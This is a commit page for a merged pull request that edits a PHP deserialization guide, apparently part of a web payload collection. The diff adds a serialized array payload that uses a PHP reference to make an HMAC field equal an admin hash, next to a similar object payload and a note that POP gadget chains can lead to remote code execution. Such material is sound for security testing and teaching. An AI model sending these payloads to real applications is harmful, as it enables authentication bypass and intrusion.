Merge pull request #246 from wuvel/master

Update PHP.md
This commit is contained in:
Swissky 2020-09-25 13:30:12 +02:00 committed by GitHub
commit a57305e75f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -111,6 +111,12 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
We can do an array to like this:
```php
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
```
## Finding and using gadgets ## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system. Also called "PHP POP Chains", they can be used to gain RCE on the system.